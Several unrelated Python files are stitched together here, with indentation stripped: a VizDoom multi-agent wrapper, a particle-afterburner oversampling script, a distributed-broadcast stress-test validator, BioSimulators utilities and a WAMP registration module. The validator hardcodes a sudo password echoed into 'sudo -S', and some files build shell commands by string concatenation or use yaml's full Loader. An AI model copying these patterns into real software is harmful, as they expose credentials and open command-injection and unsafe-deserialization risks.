env = make_env_func(player_id=-1) # temporary env just to query observation_space and stuff
self.action_space = env.action_space
self.observation_space = env.observation_space
self.default_reward_shaping = get_default_reward_shaping(env)
env.close()
self.current_reward_shaping = [self.default_reward_shaping for _ in range(self.num_agents)]
self.make_env_func = make_env_func
self.safe_init = env_config is not None and env_config.get('safe_init', False)
if self.safe_init:
sleep_seconds = env_config.worker_index * 1.0
log.info('Sleeping %.3f seconds to avoid creating all envs at once', sleep_seconds)
time.sleep(sleep_seconds)
log.info('Done sleeping at %d', env_config.worker_index)
self.env_config = env_config
self.workers = None
# only needed when rendering
self.enable_rendering = False
self.last_obs = None
self.reset_on_init = True
self.initialized = False
def get_default_reward_shaping(self):
return self.default_reward_shaping
def get_current_reward_shaping(self, agent_idx: int):
return self.current_reward_shaping[agent_idx]
def set_reward_shaping(self, reward_shaping: dict, agent_idx: int):
self.current_reward_shaping[agent_idx] = reward_shaping
self.set_env_attr(
agent_idx, 'unwrapped.reward_shaping_interface.reward_shaping_scheme', reward_shaping,
)
def await_tasks(self, data, task_type, timeout=None):
"""
Task result is always a tuple of lists, e.g.:
(
[0th_agent_obs, 1st_agent_obs, ... ],
[0th_agent_reward, 1st_agent_reward, ... ],
...
)
If your "task" returns only one result per agent (e.g. reset() returns only the observation),
the result will be a tuple of length 1. It is a responsibility of the caller to index appropriately.
"""
if data is None:
data = [None] * self.num_agents
assert len(data) == self.num_agents
for i, worker in enumerate(self.workers):
worker.task_queue.put((data[i], task_type))
result_lists = None
for i, worker in enumerate(self.workers):
results = safe_get(
worker.result_queue,
timeout=0.2 if timeout is None else timeout,
msg=f'Takes a surprisingly long time to process task {task_type}, retry...',
)
if not isinstance(results, (tuple, list)):
results = [results]
if result_lists is None:
result_lists = tuple([] for _ in results)
for j, r in enumerate(results):
result_lists[j].append(r)
return result_lists
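# Illustrative sketch (not part of the original wrapper): for a MultiAgentEnv with
# two agents, a STEP task yields a tuple of per-field lists, e.g.
#   obs, rewards, dones, infos = self.await_tasks(actions, TaskType.STEP)
#   # obs     -> [obs_agent0, obs_agent1]
#   # rewards -> [rew_agent0, rew_agent1]
# while RESET returns a 1-tuple, which is why callers index [0] as in reset() below.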
def _ensure_initialized(self):
if self.initialized:
return
self.workers = [
MultiAgentEnvWorker(i, self.make_env_func, self.env_config, reset_on_init=self.reset_on_init)
for i in range(self.num_agents)
]
init_attempt = 0
while True:
init_attempt += 1
try:
port_to_use = udp_port_num(self.env_config)
port = find_available_port(port_to_use, increment=1000)
log.debug('Using port %d', port)
init_info = dict(port=port)
lock_file = doom_lock_file(max_parallel=20)
lock = FileLock(lock_file)
with lock.acquire(timeout=10):
for i, worker in enumerate(self.workers):
worker.task_queue.put((init_info, TaskType.INIT))
if self.safe_init:
time.sleep(1.0) # just in case
else:
time.sleep(0.05)
for i, worker in enumerate(self.workers):
worker.result_queue.get(timeout=20)
except filelock.Timeout:
continue
except Exception:
raise RuntimeError('Critical error: worker stuck on initialization. Abort!')
else:
break
log.debug('%d agent workers initialized for env %d!', len(self.workers), self.env_config.worker_index)
self.initialized = True
@retry_dm(exception_class=Exception, num_attempts=3, sleep_time=1, should_reset=False)
def info(self):
self._ensure_initialized()
info = self.await_tasks(None, TaskType.INFO)[0]
return info
@retry_dm(exception_class=Exception, num_attempts=3, sleep_time=1, should_reset=False)
def reset(self):
self._ensure_initialized()
observation = self.await_tasks(None, TaskType.RESET, timeout=2.0)[0]
return observation
@retry_dm(exception_class=Exception, num_attempts=3, sleep_time=1, should_reset=True)
def step(self, actions):
self._ensure_initialized()
for frame in range(self.skip_frames - 1):
self.await_tasks(actions, TaskType.STEP)
obs, rew, dones, infos = self.await_tasks(actions, TaskType.STEP_UPDATE)
for info in infos:
info['num_frames'] = self.skip_frames
if all(dones):
obs = self.await_tasks(None, TaskType.RESET, timeout=2.0)[0]
if self.enable_rendering:
self.last_obs = obs
return obs, rew, dones, infos
# noinspection PyUnusedLocal
def render(self, *args, **kwargs):
self.enable_rendering = True
if self.last_obs is None:
return
render_multiagent = True
if render_multiagent:
obs_display = [o['obs'] for o in self.last_obs]
obs_grid = concat_grid(obs_display)
cv2.imshow('vizdoom', obs_grid)
else:
obs_display = self.last_obs[0]['obs']
cv2.imshow('vizdoom', cvt_doom_obs(obs_display))
cv2.waitKey(1)
def close(self):
if self.workers is not None:
# log.info('Stopping multiagent env %d...', self.env_config.worker_index)
for worker in self.workers:
worker.task_queue.put((None, TaskType.TERMINATE))
time.sleep(0.1)
for worker in self.workers:
worker.process.join()
def seed(self, seed=None):
"""Does not really make sense for the wrapper. Individual envs will be uniquely seeded on init."""
pass
def set_env_attr(self, agent_idx, attr_chain, value):
data = (agent_idx, attr_chain, value)
worker = self.workers[agent_idx]
worker.task_queue.put((data, TaskType.SET_ATTR))
result = safe_get(worker.result_queue, timeout=0.1)
assert result is None
|
run_oversampled_afterburner.py
|
import csv
import os
import sys
from multiprocessing import Process, current_process
import datetime as dt
import time
print("### Starting afterburner oversampling routine ###")
start_time = time.time()
# stop spawning sampling/afterburner events when
# the total number of hadrons summed over all samples
# is greater than some lower bound
min_num_particles = int(sys.argv[1])
print("Minimum number of total particles : " + str(min_num_particles))
#number particles sampled in first set
num_particles_sampled = 0
#number of cores reading the same freezeout surface
num_cores = int(sys.argv[2])
print("Cores available : " + str(num_cores) )
def spawn_afterburner(sample):
#print('{}: hello from {}'.format( dt.datetime.now(), current_process().name) )
sample_dir = "sample_" + str(sample)
os.system( 'mkdir ' + sample_dir )
os.chdir( sample_dir )
os.system( 'ln -s ../surface.dat surface.dat' )
os.system( 'ln -s ../SomeAfterburnerExecutable SomeAfterburnerExecutable' )
os.system( './SomeAfterburnerExecutable' )
os.chdir( ".." )
def get_number_particles(sample):
sample_dir = "sample_" + str(sample)
particle_list_file = open(sample_dir + '/final_soft_hadrons.dat', 'rb')
reader = csv.reader(particle_list_file)
#first header line is number of particles in list
num_particles = next(reader)
return int(num_particles[0])
#spawn the first set of jobs
if __name__ == '__main__':
worker_count = num_cores
worker_pool = []
for sample in range(worker_count):
p = Process( target = spawn_afterburner, args = (sample,) )
p.start()
worker_pool.append(p)
for p in worker_pool:
p.join()
#get the number of particles produced in the first set of samples
for sample in range(0, num_cores):
num_particles = get_number_particles(sample)
num_particles_sampled += num_particles
print("Number of particles sampled in first launch : " + str(num_particles_sampled) )
avg_num_per_sample = num_particles_sampled // num_cores
print("Average number of particles per sample : " + str(avg_num_per_sample) )
#get the total number of events we need based on the avg
num_jobs = min_num_particles // avg_num_per_sample + 1
print("Total number of jobs necessary : " + str(num_jobs) )
num_launches = ( num_jobs - 1 ) // num_cores
print("Number of launches necessary to meet minimum : " + str(num_launches) )
for launch in range(1, num_launches + 1):
if __name__ == '__main__':
worker_count = num_cores
worker_pool = []
for core in range(worker_count):
sample = launch * num_cores + core
p = Process( target = spawn_afterburner, args = (sample,) )
p.start()
worker_pool.append(p)
for p in worker_pool:
p.join()
print("Oversampling routine finished in " + str( time.time() - start_time) + " sec")
print("Goodbye!")
|
validate.py
|
#!/usr/bin/env python3
import argparse
import os, atexit
import textwrap
import time
import tempfile
import threading, subprocess
import barrier, finishedSignal
import random
import signal
import random
import time
from enum import Enum
from collections import defaultdict, OrderedDict
BARRIER_IP = "localhost"
BARRIER_PORT = 10000
SIGNAL_IP = "localhost"
SIGNAL_PORT = 11000
PROCESSES_BASE_IP = 11000
# Do not run multiple validations concurrently!
class TC:
def __init__(self, losses, interface="lo", needSudo=True, sudoPassword="dcl"):
self.losses = losses
self.interface = interface
self.needSudo = needSudo
self.sudoPassword = sudoPassword
cmd1 = "tc qdisc add dev {} root netem 2>/dev/null".format(self.interface)
cmd2 = "tc qdisc change dev {} root netem delay {} {} distribution normal loss {} {} reorder {} {}".format(
self.interface,
*self.losses["delay"],
*self.losses["loss"],
*self.losses["reordering"]
)
if self.needSudo:
os.system("echo {} | sudo -S {}".format(self.sudoPassword, cmd1))
os.system("echo {} | sudo -S {}".format(self.sudoPassword, cmd2))
else:
os.system(cmd1)
os.system(cmd2)
atexit.register(self.cleanup)
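# With the default testConfig below (delay 200ms 50ms, loss 10% 25%, reordering 25% 50%)
# the change command rendered above is, for example:
#   tc qdisc change dev lo root netem delay 200ms 50ms distribution normal loss 10% 25% reorder 25% 50%
# (requires root / sudo; the qdisc is removed again by cleanup() at exit)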
def __str__(self):
ret = """\
Interface: {}
Distribution: Normal
Delay: {} {}
Loss: {} {}
Reordering: {} {}""".format(
self.interface,
*self.losses["delay"],
*self.losses["loss"],
*self.losses["reordering"]
)
return textwrap.dedent(ret)
def cleanup(self):
cmd = "tc qdisc del dev {} root 2>/dev/null".format(self.interface)
if self.needSudo:
os.system("echo '{}' | sudo -S {}".format(self.sudoPassword, cmd))
else:
os.system(cmd)
class ProcessState(Enum):
RUNNING = 1
STOPPED = 2
TERMINATED = 3
class ProcessInfo:
def __init__(self, handle):
self.lock = threading.Lock()
self.handle = handle
self.state = ProcessState.RUNNING
@staticmethod
def stateToSignal(state):
if state == ProcessState.RUNNING:
return signal.SIGCONT
if state == ProcessState.STOPPED:
return signal.SIGSTOP
if state == ProcessState.TERMINATED:
return signal.SIGTERM
@staticmethod
def stateToSignalStr(state):
if state == ProcessState.RUNNING:
return "SIGCONT"
if state == ProcessState.STOPPED:
return "SIGSTOP"
if state == ProcessState.TERMINATED:
return "SIGTERM"
@staticmethod
def validStateTransition(current, desired):
if current == ProcessState.TERMINATED:
return False
if current == ProcessState.RUNNING:
return desired == ProcessState.STOPPED or desired == ProcessState.TERMINATED
if current == ProcessState.STOPPED:
return desired == ProcessState.RUNNING
return False
class AtomicSaturatedCounter:
def __init__(self, saturation, initial=0):
self._saturation = saturation
self._value = initial
self._lock = threading.Lock()
def reserve(self):
with self._lock:
if self._value < self._saturation:
self._value += 1
return True
else:
return False
class Validation:
def __init__(self, processes, messages, outputDir):
self.processes = processes
self.messages = messages
self.outputDirPath = os.path.abspath(outputDir)
if not os.path.isdir(self.outputDirPath):
raise Exception("`{}` is not a directory".format(self.outputDirPath))
def generateConfig(self):
# Implement on the derived classes
pass
def checkProcess(self, pid):
# Implement on the derived classes
pass
def checkAll(self, continueOnError=True):
ok = True
for pid in range(1, self.processes + 1):
ret = self.checkProcess(pid)
if not ret:
ok = False
if not ret and not continueOnError:
return False
return ok
class FifoBroadcastValidation(Validation):
def generateConfig(self):
hosts = tempfile.NamedTemporaryFile(mode="w")
config = tempfile.NamedTemporaryFile(mode="w")
for i in range(1, self.processes + 1):
hosts.write("{} localhost {}\n".format(i, PROCESSES_BASE_IP + i))
hosts.flush()
config.write("{}\n".format(self.messages))
config.flush()
return (hosts, config)
def checkProcess(self, pid):
filePath = os.path.join(self.outputDirPath, "proc{:02d}.output".format(pid))
i = 1
nextMessage = defaultdict(lambda: 1)
filename = os.path.basename(filePath)
with open(filePath) as f:
for lineNumber, line in enumerate(f):
tokens = line.split()
# Check broadcast
if tokens[0] == "b":
msg = int(tokens[1])
if msg != i:
print(
"File {}, Line {}: Messages broadcast out of order. Expected message {} but broadcast message {}".format(
filename, lineNumber, i, msg
)
)
return False
i += 1
# Check delivery
if tokens[0] == "d":
sender = int(tokens[1])
msg = int(tokens[2])
if msg != nextMessage[sender]:
print(
"File {}, Line {}: Message delivered out of order. Expected message {}, but delivered message {}".format(
filename, lineNumber, nextMessage[sender], msg
)
)
return False
else:
nextMessage[sender] = msg + 1
return True
class LCausalBroadcastValidation(Validation):
def __init__(self, processes, messages, outputDir, extraParameter):
super().__init__(processes, messages, outputDir)
# Use the `extraParameter` to pass any information you think is relevant
def generateConfig(self):
hosts = tempfile.NamedTemporaryFile(mode="w")
config = tempfile.NamedTemporaryFile(mode="w")
# membership file for the validation
membershipFile = open(self.outputDirPath + "/membership", "w")
membershipFile.write("{}\n".format(self.processes))
for i in range(1, self.processes + 1):
hosts.write("{} localhost {}\n".format(i, PROCESSES_BASE_IP + i))
membershipFile.write("{} 0.0.0.0 {}\n".format(i, PROCESSES_BASE_IP + i))
hosts.flush()
config.write("{}\n".format(self.messages))
self.dependencies = [0] * (self.processes + 1)
for i in range(1, self.processes + 1):
config.write("{} ".format(i))
membershipFile.write("{} ".format(i))
n = random.randint(0, self.processes)
list_dep = random.sample(range(1, self.processes + 1), n)
if i in list_dep:
list_dep.remove(i)
self.dependencies[i] = list_dep
config.write("{}\n".format(" ".join([str(x) for x in list_dep])))
membershipFile.write("{}\n".format(" ".join([str(x) for x in list_dep])))
config.flush()
membershipFile.close()
return (hosts, config)
def checkProcess(self, pid):
result = subprocess.run(
["python3", "./test_lcb.py", self.outputDirPath], stdout=subprocess.PIPE
)
correctIncorrect = result.stdout.decode("utf-8").split("\n")[-2]
if correctIncorrect == "CORRECT":
return True
else:
return False
class StressTest:
def __init__(self, procs, concurrency, attempts, attemptsRatio):
self.processes = len(procs)
self.processesInfo = dict()
for (logicalPID, handle) in procs:
self.processesInfo[logicalPID] = ProcessInfo(handle)
self.concurrency = concurrency
self.attempts = attempts
self.attemptsRatio = attemptsRatio
maxTerminatedProcesses = (
self.processes // 2
if self.processes % 2 == 1
else (self.processes - 1) // 2
)
self.terminatedProcs = AtomicSaturatedCounter(maxTerminatedProcesses)
def stress(self):
selectProc = list(range(1, self.processes + 1))
random.shuffle(selectProc)
selectOp = (
[ProcessState.STOPPED] * int(1000 * self.attemptsRatio["STOP"])
+ [ProcessState.RUNNING] * int(1000 * self.attemptsRatio["CONT"])
+ [ProcessState.TERMINATED] * int(1000 * self.attemptsRatio["TERM"])
)
random.shuffle(selectOp)
successfulAttempts = 0
while successfulAttempts < self.attempts:
proc = random.choice(selectProc)
op = random.choice(selectOp)
info = self.processesInfo[proc]
with info.lock:
if ProcessInfo.validStateTransition(info.state, op):
if op == ProcessState.TERMINATED:
reserved = self.terminatedProcs.reserve()
if reserved:
selectProc.remove(proc)
else:
continue
time.sleep(float(random.randint(50, 500)) / 1000.0)
info.handle.send_signal(ProcessInfo.stateToSignal(op))
info.state = op
successfulAttempts += 1
print(
"Sending {} to process {}".format(
ProcessInfo.stateToSignalStr(op), proc
)
)
# if op == ProcessState.TERMINATED and proc not in terminatedProcs:
# if len(terminatedProcs) < maxTerminatedProcesses:
# terminatedProcs.add(proc)
# if len(terminatedProcs) == maxTerminatedProcesses:
# break
def remainingUnterminatedProcesses(self):
remaining = []
for pid, info in self.processesInfo.items():
with info.lock:
if info.state != ProcessState.TERMINATED:
remaining.append(pid)
return None if len(remaining) == 0 else remaining
def terminateAllProcesses(self):
for _, info in self.processesInfo.items():
with info.lock:
if info.state != ProcessState.TERMINATED:
if info.state == ProcessState.STOPPED:
info.handle.send_signal(
ProcessInfo.stateToSignal(ProcessState.RUNNING)
)
info.handle.send_signal(
ProcessInfo.stateToSignal(ProcessState.TERMINATED)
)
return False
def continueStoppedProcesses(self):
for _, info in self.processesInfo.items():
with info.lock:
if info.state != ProcessState.TERMINATED:
if info.state == ProcessState.STOPPED:
info.handle.send_signal(
ProcessInfo.stateToSignal(ProcessState.RUNNING)
)
def run(self):
if self.concurrency > 1:
threads = [
threading.Thread(target=self.stress) for _ in range(self.concurrency)
]
[p.start() for p in threads]
[p.join() for p in threads]
else:
self.stress()
def startProcesses(processes, runscript, hostsFilePath, configFilePath, outputDir):
runscriptPath = os.path.abspath(runscript)
if not os.path.isfile(runscriptPath):
raise Exception("`{}` is not a file".format(runscriptPath))
if os.path.basename(runscriptPath) != "run.sh":
raise Exception("`{}` is not a runscript".format(runscriptPath))
outputDirPath = os.path.abspath(outputDir)
if not os.path.isdir(outputDirPath):
raise Exception("`{}` is not a directory".format(outputDirPath))
baseDir, _ = os.path.split(runscriptPath)
bin_cpp = os.path.join(baseDir, "bin", "da_proc")
bin_java = os.path.join(baseDir, "bin", "da_proc.jar")
if os.path.exists(bin_cpp):
cmd = [bin_cpp]
elif os.path.exists(bin_java):
cmd = ["java", "-jar", bin_java]
else:
raise Exception(
"`{}` could not find a binary to execute. Make sure you build before validating".format(
runscriptPath
)
)
procs = []
for pid in range(1, processes + 1):
cmd_ext = [
"--id",
str(pid),
"--hosts",
hostsFilePath,
"--barrier",
"{}:{}".format(BARRIER_IP, BARRIER_PORT),
"--signal",
"{}:{}".format(SIGNAL_IP, SIGNAL_PORT),
"--output",
os.path.join(outputDirPath, "proc{:02d}.output".format(pid)),
configFilePath,
]
stdoutFd = open(
os.path.join(outputDirPath, "proc{:02d}.stdout".format(pid)), "w"
)
stderrFd = open(
os.path.join(outputDirPath, "proc{:02d}.stderr".format(pid)), "w"
)
procs.append(
(pid, subprocess.Popen(cmd + cmd_ext, stdout=stdoutFd, stderr=stderrFd))
)
return procs
def main(processes, messages, runscript, broadcastType, logsDir, testConfig):
# Set tc for loopback
tc = TC(testConfig["TC"])
print(tc)
# Start the barrier
initBarrier = barrier.Barrier(BARRIER_IP, BARRIER_PORT, processes)
initBarrier.listen()
startTimesFuture = initBarrier.startTimesFuture()
initBarrierThread = threading.Thread(target=initBarrier.wait)
initBarrierThread.start()
# Start the finish signal
finishSignal = finishedSignal.FinishedSignal(SIGNAL_IP, SIGNAL_PORT, processes)
finishSignal.listen()
finishSignalThread = threading.Thread(target=finishSignal.wait)
finishSignalThread.start()
if broadcastType == "fifo":
validation = FifoBroadcastValidation(processes, messages, logsDir)
else:
# Use the last argument (now it's `None` since it's not being used) to
# pass any information that you think is relevant
validation = LCausalBroadcastValidation(processes, messages, logsDir, None)
hostsFile, configFile = validation.generateConfig()
try:
# Start the processes and get their PIDs
procs = startProcesses(
processes, runscript, hostsFile.name, configFile.name, logsDir
)
# Create the stress test
st = StressTest(
procs,
testConfig["ST"]["concurrency"],
testConfig["ST"]["attempts"],
testConfig["ST"]["attemptsDistribution"],
)
for (logicalPID, procHandle) in procs:
print(
"Process with logicalPID {} has PID {}".format(
logicalPID, procHandle.pid
)
)
initBarrierThread.join()
print("All processes have been initialized.")
st.run()
print("StressTest is complete.")
print("Resuming stopped processes.")
st.continueStoppedProcesses()
print("Waiting until all running processes have finished broadcasting.")
finishSignalThread.join()
for pid, startTs in OrderedDict(sorted(startTimesFuture.items())).items():
print(
"Process {} finished broadcasting {} messages in {} ms".format(
pid, messages, finishSignal.endTimestamps()[pid] - startTs
)
)
unterminated = st.remainingUnterminatedProcesses()
if unterminated is not None:
input(
"Hit `Enter` to terminate the remaining processes with logicalPIDs {}.".format(
unterminated
)
)
st.terminateAllProcesses()
mutex = threading.Lock()
def waitForProcess(logicalPID, procHandle, mutex):
procHandle.wait()
with mutex:
print(
"Process {} exited with {}".format(
logicalPID, procHandle.returncode
)
)
# Monitor which processes have exited
monitors = [
threading.Thread(
target=waitForProcess, args=(logicalPID, procHandle, mutex)
)
for (logicalPID, procHandle) in procs
]
[p.start() for p in monitors]
[p.join() for p in monitors]
input("Hit `Enter` to validate the output")
print("Result of validation: {}".format(validation.checkAll()))
finally:
if procs is not None:
for _, p in procs:
p.kill()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"-r", "--runscript", required=True, dest="runscript", help="Path to run.sh",
)
parser.add_argument(
"-b",
"--broadcast",
choices=["fifo", "lcausal"],
required=True,
dest="broadcastType",
help="Which broadcast implementation to test",
)
parser.add_argument(
"-l",
"--logs",
required=True,
dest="logsDir",
help="Directory to store stdout, stderr and outputs generated by the processes",
)
parser.add_argument(
"-p",
"--processes",
required=True,
type=int,
dest="processes",
help="Number of processes that broadcast",
)
parser.add_argument(
"-m",
"--messages",
required=True,
type=int,
dest="messages",
help="Maximum number (because it can crash) of messages that each process can broadcast",
)
results = parser.parse_args()
testConfig = {
# Network configuration using the tc command
"TC": {
"delay": ("200ms", "50ms"),
"loss": ("10%", "25%"),
"reordering": ("25%", "50%"),
},
# StressTest configuration
"ST": {
"concurrency": 8, # How many threads are interferring with the running processes
"attempts": 8, # How many interferring attempts each threads does
"attemptsDistribution": { # Probability with which an interferring thread will
"STOP": 0.48, # select an interferring action (make sure they add up to 1)
"CONT": 0.48,
"TERM": 0.04,
},
},
}
main(
results.processes,
results.messages,
results.runscript,
results.broadcastType,
results.logsDir,
testConfig,
)
|
utils.py
|
from biosimulators_utils.log.data_model import CombineArchiveLog # noqa: F401
from biosimulators_utils.report.data_model import SedDocumentResults # noqa: F401
from ...exceptions import RequestTimeoutException
import functools
import importlib
import multiprocessing
import os
import sys
import time
import types # noqa: F401
import werkzeug.wrappers.response # noqa: F401
import yaml
__all__ = [
'get_simulators',
'get_simulator_specs',
'get_simulator_api',
'get_simulator_metadata',
'use_simulator_api_to_exec_sedml_docs_in_combine_archive',
'exec_in_subprocess',
]
@functools.lru_cache(maxsize=None)
def get_simulators():
""" Get the ids and APIs of the available simulation tools
Returns:
:obj:`list` of :obj:`dict`: list of the id and name of the module which implements the API for
each available simulation tool
"""
with open(os.path.join(os.path.dirname(__file__), 'simulators.yml'), 'r') as file:
return yaml.load(file, Loader=yaml.Loader)
def get_simulator_specs():
""" Get the specifications of the available simulation tools
Returns:
:obj:`werkzeug.wrappers.response.Response`: response which contains a list of
elements encoded in schema ``Simulator``
"""
simulators = []
for sim in get_simulators():
simulators.append(exec_in_subprocess(get_simulator_metadata, sim['id']))
return simulators
def get_simulator_specs_cache_filename():
""" Get the path to cache the specifications of simulation tools
Returns:
:obj:`str`: path to cache the specifications of simulation tools
"""
return os.path.expanduser(os.path.join('~', '.cache', 'simulators.yml'))
def write_simulator_specs_cache(simulators=None, filename=None):
""" Get the specifications of simulations tools and cache them to a file
Args:
simulators (:obj:`werkzeug.wrappers.response.Response`, optional): response which contains a list of
elements encoded in schema ``Simulator``
filename (:obj:`str`, optional): path to cache the specifications of simulation tools
"""
simulators = simulators or get_simulator_specs()
filename = filename or get_simulator_specs_cache_filename()
dirname = os.path.dirname(filename)
if not os.path.isdir(dirname):
os.makedirs(dirname)
with open(filename, 'w') as file:
file.write(yaml.dump(simulators))
def read_simulator_specs_cache(filename=None):
""" Read the specifications of simulations tools from a file
Args:
filename (:obj:`str`, optional): path to read the specifications of simulation tools
Returns:
:obj:`werkzeug.wrappers.response.Response`: response which contains a list of
elements encoded in schema ``Simulator``
"""
filename = filename or get_simulator_specs_cache_filename()
if not os.path.isfile(filename):
write_simulator_specs_cache(filename=filename)
with open(filename, 'r') as file:
return yaml.load(file, Loader=yaml.Loader)
def get_simulator_api(api, reload=False):
""" Get the BioSimulators API for a simulator
Args:
api (:obj:`str`): module which implements the API for the simulator
reload (:obj:`bool`, optional): whether to reload the API
Returns:
:obj:`types.ModuleType`
"""
module = importlib.import_module(api)
if reload:
importlib.reload(module)
return module
def get_simulator_metadata(id):
""" Get metadata about a simulator
Args:
id (:obj:`str`): BioSimulators id of the simulator
Returns:
:obj:`dict`: metadata about the simulator
"""
simulator = next(simulator for simulator in get_simulators() if simulator['id'] == id)
id = simulator['id']
name = simulator['name']
api_module = simulator['api']['module']
api = get_simulator_api(api_module)
version = api.get_simulator_version()
api_version = api.__version__
return {
'_type': 'Simulator',
'id': id,
'name': name,
'version': version,
'api': {
'_type': 'SimulatorApi',
'module': api_module,
'package': simulator['api']['package'],
'version': api_version,
},
'specs': 'https://api.biosimulators.org/simulators/{}/{}'.format(id, version),
}
def use_simulator_api_to_exec_sedml_docs_in_combine_archive(api_name, *args, **kwargs):
""" Execute the SED-ML tasks defined in a COMBINE/OMEX archive and save the outputs
Args:
api_name (:obj:`str`): module which implements the API for the simulator
*args (:obj:`list`): positional arguments to ``exec_sedml_docs_in_combine_archive``
**kwargs (:obj:`dict`): keyword arguments to ``exec_sedml_docs_in_combine_archive``
Returns:
:obj:`tuple`:
* :obj:`SedDocumentResults`: results
* :obj:`dict` in the ``SimulationRunResults`` schema: log
"""
api = get_simulator_api(api_name)
results, log = api.exec_sedml_docs_in_combine_archive(*args, **kwargs)
if log:
log = log.to_json()
return results, log
class Process(multiprocessing.context.ForkProcess):
""" Fork process which collects the exceptions of its child
Attributes:
_parent_conn (:obj:`multiprocessing.connection.Connection`): connection for the parent
_child_conn (:obj:`multiprocessing.connection.Connection`): connection for the child
_exception (:obj:`Exception` or :obj:`None`): exception, if any, from the process' child
Inspired by https://stackoverflow.com/questions/19924104/
"""
def __init__(self, *args, **kwargs):
super(multiprocessing.context.ForkProcess, self).__init__(*args, **kwargs)
self._parent_conn, self._child_conn = multiprocessing.Pipe()
self._exception = None
def run(self):
""" Run the process """
try:
super(multiprocessing.context.ForkProcess, self).run()
self._child_conn.send(False)
except Exception as exception:
self._child_conn.send(exception.with_traceback(sys.exc_info()[2]))
@property
def exception(self):
""" Get the exception from process' child, if any
Returns:
:obj:`Exception` or :obj:`None`: exception, if any, from the process' child
"""
if self._parent_conn.poll():
self._exception = self._parent_conn.recv()
return self._exception
def exec_in_subprocess(func, *args, poll_interval=0.01, timeout=None, **kwargs):
""" Execute a function in a fork
Args:
func (:obj:`types.FunctionType`): function
*args (:obj:`list`): list of positional arguments for the function
poll_interval (:obj:`float`, optional): interval to poll the status of the subprocess
timeout (:obj:`float`, optional): maximum execution time in seconds
**kwargs (:obj:`dict`, optional): dictionary of keyword arguments for the function
Returns:
:obj:`object`: result of the function
"""
context_instance = multiprocessing.get_context('fork')
queue = context_instance.Queue()
process = Process(target=subprocess_target, args=[queue, func] + list(args), kwargs=kwargs)
process.start()
start_time = time.time()
while process.exception is None:
time.sleep(poll_interval)
if timeout is not None and (time.time() - start_time) > timeout:
msg = 'Execution did not complete in {} s. Requests are limited to {} s'.format(timeout, timeout)
raise RequestTimeoutException(
title='Request timed out',
instance=TimeoutError(msg),
)
if process.exception:
raise process.exception
results = queue.get()
return results
def subprocess_target(queue, func, *args, **kwargs):
""" Target executer for a subprocess
Args:
queue (:obj:`multiprocessing.queues.Queue`): queue to send the results of the function to
func (:obj:`types.FunctionType`): function to execute
args (:obj:`list`): list of positional arguments for the function
kwargs (:obj:`dict`): dictionary of keyword arguments for the function
"""
result = func(*args, **kwargs)
queue.put(result)
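# Illustrative sketch (not part of the original module): running a function in a
# fork with a timeout via `exec_in_subprocess`. `slow_add` is a hypothetical
# example; if it does not finish within `timeout` seconds, a
# `RequestTimeoutException` is raised, and any exception it raises in the child
# is re-raised in the parent.
def _example_exec_in_subprocess():
    def slow_add(x, y, delay=0.1):
        time.sleep(delay)
        return x + y
    # run `slow_add(1, 2)` in a forked child; the result is returned through a queue
    return exec_in_subprocess(slow_add, 1, 2, timeout=5.0)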
|
registrations.py
|
import threading
from .uri import *
class WAMPRegistrations(object):
def __init__(self):
self.registered = WAMPURIList()
self.subscribed = WAMPURIList()
def register_local(self,uri,callback,options=None):
""" Registers a local function for handling requests.
This is the end function of using the @wamp.register
decorator on a function
"""
registration_id = secure_rand()
reg_uri = WAMPURI(uri,{
'type': 'local',
'callback': callback,
'registration_id': registration_id,
},options)
self.registered.append(reg_uri)
return registration_id
def register_remote(self,uri,client,options=None):
""" Adds a client that's offering to support a particular
callback on a uri
"""
registration_id = secure_rand()
self.registered.append(
WAMPURI(uri,{
'type': 'remote',
'client': client,
'registration_id': registration_id,
},options)
)
return registration_id
def unregister(self,registration_id):
""" Removes a URI as a callback target
"""
self.registered.remove(lambda r: r['registration_id'] == registration_id)
return registration_id
def invoke(self,client,request,callback):
""" Runs the RPC code associated with the URI
"""
uri = request.procedure
args = request.args
kwargs = request.kwargs
handlers = self.registered.match(uri)
if not handlers:
raise Exception('uri does not exist')
# Use the first matched handler
handler = handlers[0]
# We will disclose the identity by default
# FIXME: we want to parallel the autobahn flexibility with
# authorizers in the future
details = {
'procedure': uri,
'progress': 0,
'caller': client.session_id,
'caller_authid': client.auth.get('authid'),
'caller_role': client.auth.get('role'),
'enc_algo': None,
}
if handler['type'] == 'local':
def thread_run():
try:
registration_id = handler['registration_id']
invoke = INVOCATION(
request_id=request.request_id,
registration_id=registration_id,
details=details
)
result = handler['callback'](invoke,*args,**kwargs)
callback(RESULT(
request_id = request.request_id,
details = details,
args = [ result ],
kwargs = {}
))
except Exception as ex:
import traceback
traceback.print_exc()
callback(ERROR(
request_code = WAMP_INVOCATION,
request_id = request.request_id,
details = details,
error = uri,
args = [u'Call failed: {}'.format(ex)],
))
thread_process = threading.Thread(target=thread_run)
thread_process.daemon = True
thread_process.start()
elif handler['type'] == 'remote':
def on_yield(result):
if result == WAMP_YIELD:
callback(RESULT(
request_id = request.request_id,
details = details,
args = result.args,
kwargs = result.kwargs
))
else:
callback(result)
registration_id = handler['registration_id']
handler_client = handler['client']
if handler_client.closed():
self.reap_client(handler_client)
raise Exception('uri does not exist')
handler_client.send_and_await_response(
INVOCATION(
request_id=request.request_id,
registration_id=registration_id,
details=details,
args=args,
kwargs=kwargs
),
on_yield
)
else:
raise Exception('Unknown handler type')
def invoke_local(self,auth,request,callback):
""" Runs the RPC code associated with the URI
"""
uri = request.procedure
args = request.args
kwargs = request.kwargs
handlers = self.registered.match(uri)
if not handlers:
raise Exception('uri does not exist')
# Use the first matched handler
handler = handlers[0]
# We will disclose the identity by default
# FIXME: we want to parallel the autobahn flexibility with
# authorizers in the future
details = {
'procedure': uri,
'progress': 0,
# FIXME: what should the caller be when it's the server?
# The server can really be whatever it wants, so we're currently
# going with session 0?
#'caller': client.session_id,
'caller': 0,
'caller_authid': auth.get('authid'),
'caller_role': auth.get('role'),
'enc_algo': None,
}
if handler['type'] == 'local':
def thread_run():
try:
registration_id = handler['registration_id']
invoke = INVOCATION(
request_id=request.request_id,
registration_id=registration_id,
details=details
)
result = handler['callback'](invoke,*args,**kwargs)
callback(RESULT(
request_id = request.request_id,
details = details,
args = [ result ],
kwargs = {}
))
except Exception as ex:
import traceback
traceback.print_exc()
callback(ERROR(
request_code = WAMP_INVOCATION,
request_id = request.request_id,
details = details,
error = uri,
args = [u'Call failed: {}'.format(ex)],
))
thread_process = threading.Thread(target=thread_run)
